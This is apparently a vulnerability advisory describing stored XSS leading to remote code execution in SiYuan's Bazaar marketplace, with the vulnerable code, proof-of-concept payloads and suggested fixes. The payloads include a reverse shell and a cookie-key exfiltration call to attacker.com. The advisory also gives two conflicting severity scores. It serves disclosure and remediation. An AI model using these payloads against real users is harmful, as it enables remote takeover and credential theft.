PT-2026-28774 · Go · Siyuan
Published
2026-03-16
·
Updated
2026-03-16
CVSS v4.0
5.3
Medium
| Vector | AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N |
Remote Code Execution via Malicious Bazaar Package — Marketplace XSS
Summary
SiYuan's Bazaar (community marketplace) renders plugin/theme/template metadata and README content without sanitization. A malicious package author can achieve RCE on any user who browses the Bazaar by:
- Package metadata XSS (zero-click): Package
displayNameanddescriptionfields are injected directly into HTML via template literals without escaping. Just loading the Bazaar page triggers execution. - README XSS (one-click): The
renderREADMEfunction useslute.New()withoutSetSanitize(true), so raw HTML in the README passes through toinnerHTMLunsanitized.
Both vectors execute in Electron's renderer with
nodeIntegration: true and contextIsolation: false, giving full OS command execution.Affected Component
- Metadata rendering:
app/src/config/bazaar.ts:275-277 - README rendering (backend):
kernel/bazaar/package.go:635-645(renderREADME) - README rendering (frontend):
app/src/config/bazaar.ts:607(innerHTML) - Electron config:
app/electron/main.js:422-426(nodeIntegration: true) - Version: SiYuan <= 3.5.9
Vulnerable Code
Vector 1: Package metadata — no HTML escaping (bazaar.ts:275-277)
typescript
// Package name injected directly into HTML template — NO escaping
${item.preferredName}${item.preferredName !== item.name
? ` <span class="ft on-surface ft smaller">${item.name}</span>` : ""}
// Package description injected directly — NO escaping
<div class="b3-card desc" title="${escapeAttr(item.preferredDesc) || ""}">
${item.preferredDesc || ""} <!-- UNESCAPED HTML -->
</div>Note: The
title attribute uses escapeAttr(), but the actual text content does not — inconsistent escaping.Vector 2: README rendering — no Lute sanitization (package.go:635-645)
go
func renderREADME(repoURL string, mdData []byte) (ret string, err error) {
luteEngine := lute.New() // Fresh Lute instance — SetSanitize NOT called
luteEngine.SetSoftBreak2HardBreak(false)
luteEngine.SetCodeSyntaxHighlight(false)
linkBase := "https://cdn.jsdelivr.net/gh/" + ...
luteEngine.SetLinkBase(linkBase)
ret = luteEngine.Md2HTML(string(mdData)) // Raw HTML in markdown preserved
return
}Compare with the SiYuan note renderer in
kernel/util/lute.go:81:go
luteEngine.SetSanitize(true) // Notes ARE sanitized — but README is NOTFrontend innerHTML injection (bazaar.ts:607)
typescript
fetchPost("/api/bazaar/getBazaarPackageREADME", {...}, response => {
mdElement.innerHTML = response.data.html; // Unsanitized HTML from README
});Proof of Concept
Vector 1: Malicious package manifest (zero-click RCE)
A malicious
plugin.json (or theme.json, template.json):json
{
"name": "helpful-plugin",
"displayName": {
"default": "Helpful Plugin<img src=x onerror="require('child process').exec('calc.exe')">"
},
"description": {
"default": "A helpful plugin<img src=x onerror="require('child process').exec('id>/tmp/pwned')">"
},
"version": "1.0.0"
}When any user opens the Bazaar page and this package is in the listing, the
onerror handler fires automatically (since src=x fails to load), executing arbitrary OS commands.Vector 2: Malicious README.md (one-click RCE)
markdown
# Helpful Plugin
This plugin does helpful things.
<img src=x onerror="require('child process').exec('calc.exe')">
## Installation
Follow the usual steps.When a user clicks on the package to view its README, the raw HTML is rendered via
innerHTML without sanitization, executing the onerror handler.Reverse shell via README
markdown
# Cool Theme
<img src=x onerror="require('child process').exec('bash -c "bash -i >& /dev/tcp/attacker.com/4444 0>&1"')">Data exfiltration via package name
json
{
"displayName": {
"default": "<img src=x onerror="fetch('https://attacker.com/exfil?token='+require('fs').readFileSync(require('path').join(require('os').homedir(),'.config/siyuan/cookie.key'),'utf8'))">"
}
}Attack Scenario
- Attacker creates a GitHub repository with a plugin/theme/template
- Attacker submits it to the SiYuan Bazaar (community marketplace)
- Package manifest contains XSS payload in
displayNameordescription - Zero-click: When ANY user browses the Bazaar, the package listing renders the malicious name/description → JavaScript executes → RCE
- One-click: If the package README also contains raw HTML, clicking to view details triggers additional payloads
The attacker doesn't need to trick the user into installing anything. Simply browsing the marketplace is enough.
Impact
- Severity: CRITICAL (CVSS 9.6)
- Type: CWE-79 (Improper Neutralization of Input During Web Page Generation)
- Full remote code execution via Electron's
nodeIntegration: true - Zero-click for metadata XSS — triggers on page load
- Supply-chain attack vector targeting all Bazaar users
- Can steal API tokens, session cookies, SSH keys, arbitrary files
- Can install persistence, backdoors, or ransomware
- Affects all SiYuan desktop users who browse the Bazaar
Suggested Fix
1. Escape package metadata in template rendering (bazaar.ts)
typescript
// Use a proper HTML escape function
function escapeHtml(str: string): string {
return str.replace(/&/g, '&').replace(/</g, '<')
.replace(/>/g, '>').replace(/"/g, '"');
}
// Apply to all user-controlled metadata
${escapeHtml(item.preferredName)}
<div class="b3-card desc">${escapeHtml(item.preferredDesc || "")}</div>2. Enable Lute sanitization for README rendering (package.go)
go
func renderREADME(repoURL string, mdData []byte) (ret string, err error) {
luteEngine := lute.New()
luteEngine.SetSanitize(true) // ADD THIS
luteEngine.SetSoftBreak2HardBreak(false)
luteEngine.SetCodeSyntaxHighlight(false)
// ...
}3. Long-term: Harden Electron configuration
javascript
webPreferences: {
nodeIntegration: false,
contextIsolation: true,
sandbox: true,
}Fix
XSS
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Siyuan